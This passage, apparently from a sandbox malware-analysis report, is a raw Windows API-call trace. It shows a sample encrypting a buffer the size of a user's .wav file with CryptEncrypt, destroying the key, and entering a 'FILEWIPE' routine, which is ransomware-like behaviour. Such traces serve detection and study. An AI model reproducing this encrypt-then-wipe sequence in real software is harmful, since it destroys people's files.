| out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0182.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.119] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.119] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0182.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0182.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.120] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0182.120] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.120] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.120] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0182.120] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.120] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0182.139] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.139] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.139] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.139] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.140] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.140] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x18a5d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x18a60) returned 1 [0182.140] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.140] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.141] CharLowerBuffW (in: lpsz="byte[100961]", cchLength=0xc | out: lpsz="byte[100961]") returned 0xc [0182.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.143] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.143] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.146] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa904d8*, pdwDataLen=0x87e820*=0x18a5d, dwBufLen=0x18a60 | out: pbData=0xa904d8*, pdwDataLen=0x87e820*=0x18a60) returned 1 [0182.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.149] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0182.149] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.149] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0182.149] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.149] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.149] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.149] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.149] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0182.149] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.150] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.150] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.159] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.159] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.159] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.168] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.168] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.168] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0182.168] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0182.169] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.169] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0182.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.169] CryptDestroyKey (hKey=0x90af98) returned 1 [0182.169] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0182.169] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0182.170] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0182.170] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0182.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0182.170] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0182.170] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0182.171] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0182.171] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.171] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0182.171] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0182.171] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0182.171] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0182.171] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0182.171] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.171] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0182.171] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.171] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0182.171] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.172] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.172] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.172] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.172] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0182.172] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.172] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.172] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0182.172] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0182.172] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0182.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.172] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0182.173] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.173] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.173] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0182.173] FreeLibrary (hLibModule=0x74f20000) returned 1 [0182.173] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.173] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.175] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.179] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.179] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0182.179] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.180] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.180] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ad4f0, ftCreationTime.dwHighDateTime=0x1d5daa3, ftLastAccessTime.dwLowDateTime=0xa12b5b80, ftLastAccessTime.dwHighDateTime=0x1d5e5cc, ftLastWriteTime.dwLowDateTime=0xa12b5b80, ftLastWriteTime.dwHighDateTime=0x1d5e5cc, nFileSizeHigh=0x0, nFileSizeLow=0x18a5d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="R64I-TKxh1f.wav", cAlternateFileName="R64I-T~1.WAV")) returned 0x90ae18 [0182.180] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0182.180] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.180] CharLowerBuffW (in: lpsz="byte[100957]", cchLength=0xc | 